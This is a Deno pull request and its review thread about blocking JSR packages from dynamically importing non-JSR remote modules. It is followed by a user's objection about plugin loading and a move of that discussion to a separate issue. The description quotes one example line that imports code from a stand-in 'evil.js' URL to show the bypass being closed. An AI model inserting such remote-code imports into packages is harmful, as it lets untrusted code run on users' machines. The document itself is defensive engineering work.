### PR TITLE
fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR

### PR DESCRIPTION
**Pull request by dsherret**
A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.

### CODE REVIEW

**Review by bartlomieju — APPROVED** [review]
LGTM

**Comment by lowlighter** [comment]
Sorry to bother on an already merged PR, but it feels like this may be arbitraty too strict 

I was trying to implement a pattern similar to what [dprint](https://dprint.dev/config/#example) does for plugins, i.e. basically end-users can specify which path/url to imports their plugins from:
```js
"plugins": [
  // You may specify any urls or file paths here that you wish.
  "https://plugins.dprint.dev/typescript-0.91.7.wasm",
  "https://plugins.dprint.dev/json-0.19.3.wasm",
  "https://plugins.dprint.dev/markdown-0.17.8.wasm"
]
```

However this pattern cannot be reproduced at all with jsr packages since it is blocked by the runtime:
```
Uncaught ReferenceError: Failed to import some plugins: 
TypeError: Importing https://esm.sh/jsr/@libs/markdown/plugins/emojis blocked. 
JSR packages cannot import non-JSR remote modules for security reasons.
    at Function.with (https://jsr.io/@libs/markdown/1.2.1/renderer.ts:121:13)
```
*NB: in the example the plugin is published to jsr, but I'm importing from esm.sh for testing and example purposes*

___

While I understand the motivations behind, it feels like it totally bypasses the Deno Permissions system, which is already supposed to prevent risks from "evil scripts" (assuming the user don't run all their scripts with `--allow-all`, which they shouldn't anyways)

I would have expected a behaviour more similar to what `deno repl` does, i.e. checking whether the `--allow-net` permissions is granted or not when dynamically importing:
image

If it's a strong position against, maybe would it be possible to add a `--allow-dynamic-import=...` flag ?
This pattern is useful for bigger tooling/frameworks that lets end user customize/plug their own scripts, but for now it seems impossible to reproduce (at least not in jsr ecosystem)

Note that this is a case where it's the ***end-user that run the script that provides their imports, not the maintainer***, so the import is trusted by the end-user (at least they're the one that provided them)

**Comment by bartlomieju** [comment]
@lowlighter can you open a new issue? It's easier to get it noticed than commenting on an old PR.

**Comment by lowlighter** [comment]
I've forwarded the previous comment to a separate issue #25360

**Pull request merged**
